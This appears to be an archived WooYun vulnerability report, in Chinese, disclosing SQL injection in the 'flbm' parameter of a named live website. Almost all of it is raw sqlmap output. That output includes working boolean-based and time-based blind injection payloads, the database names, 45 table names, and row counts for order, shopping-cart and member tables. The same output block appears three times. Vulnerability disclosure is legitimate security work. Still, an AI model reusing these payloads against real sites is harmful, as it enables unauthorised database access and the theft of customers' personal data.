乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开
注入
注入点
http://www.xuanhao.com/help/help.php?flbm=0907
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: flbm (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flbm=0907' AND 5791=5791 AND 'jBSb'='jBSb Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: flbm=0907' AND (SELECT * FROM (SELECT(SLEEP(10)))dVwa) AND 'GVgY'='GVgY---web application technology: PHP 5.2.11, Apache 2.2.14back-end DBMS: MySQL 5.0.11available databases [8]:[*] `15_testxh`[*] `28_2011xuan`[*] `46_gdxuanhao`[*] `47_szxuanhao`[*] information_schema[*] js_xuanhao[*] test[*] xuanhaodotcomsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: flbm (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flbm=0907' AND 5791=5791 AND 'jBSb'='jBSb Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: flbm=0907' AND (SELECT * FROM (SELECT(SLEEP(10)))dVwa) AND 'GVgY'='GVgY---web application technology: PHP 5.2.11, Apache 2.2.14back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: flbm (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flbm=0907' AND 5791=5791 AND 'jBSb'='jBSb Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: flbm=0907' AND (SELECT * FROM (SELECT(SLEEP(10)))dVwa) AND 'GVgY'='GVgY---web application technology: PHP 5.2.11, Apache 2.2.14back-end DBMS: MySQL 5.0.11Database: 28_2011xuan[45 tables]+---------------------+| c_category || c_company || c_glry || c_glrydl || c_storage || c_ware || c_ware_tmp || c_website || hao_bm || hao_dyfl || hao_dzhm || hao_glry || hao_glrydl || hao_glryqx_category || hao_glryxs || hao_gwc_ddb || hao_gwc_ddb_bak || hao_gwc_shr || hao_gwc_shr_bak || hao_gwc_wdsc || hao_gwc_xx || hao_gwc_xx_bak || hao_hyjbxx || hao_news || hao_news_category || hao_number || hao_numberbak || hao_spfl || hao_sppl || hao_spsx || hao_spxqtp || hao_spxx || hao_stroke || hao_temp || hao_tmp || hao_tplj || hao_tpljxq || hao_tzsc || hao_website || hao_xwfl || hao_xwpl || hao_xwtp || hao_xwxq || hao_xwztml || hao_zxzx |+---------------------+Database: 28_2011xuan+---------------------+---------+| Table | Entries |+---------------------+---------+| hao_spxx | 410949 || hao_gwc_xx | 102230 || hao_gwc_shr | 90035 || hao_gwc_ddb | 85502 || hao_glrydl | 61525 || hao_glryxs | 53117 || hao_gwc_xx_bak | 45656 || hao_gwc_ddb_bak | 42239 || hao_gwc_shr_bak | 42227 || hao_hyjbxx | 28466 || c_ware | 25202 || hao_gwc_wdsc | 19721 || hao_xwxq | 6329 || hao_numberbak | 5296 || hao_tpljxq | 4575 || c_glrydl | 4529 || hao_tzsc | 4371 || hao_dyfl | 2764 || hao_zxzx | 2253 || hao_dzhm | 1915 || c_storage | 391 || hao_spsx | 297 || hao_sppl | 263 || hao_xwtp | 132 || hao_bm | 100 || hao_stroke | 81 || hao_xwfl | 78 || hao_xwpl | 59 || hao_spfl | 41 || c_category | 37 || hao_glryqx_category | 30 || hao_glry | 29 || c_glry | 11 || hao_tplj | 7 || hao_xwztml | 2 || c_website | 1 || hao_news | 1 || hao_news_category | 1 || hao_temp | 1 || hao_website | 1 |+---------------------+---------+
如上
- -
未能联系到厂商或者厂商积极拒绝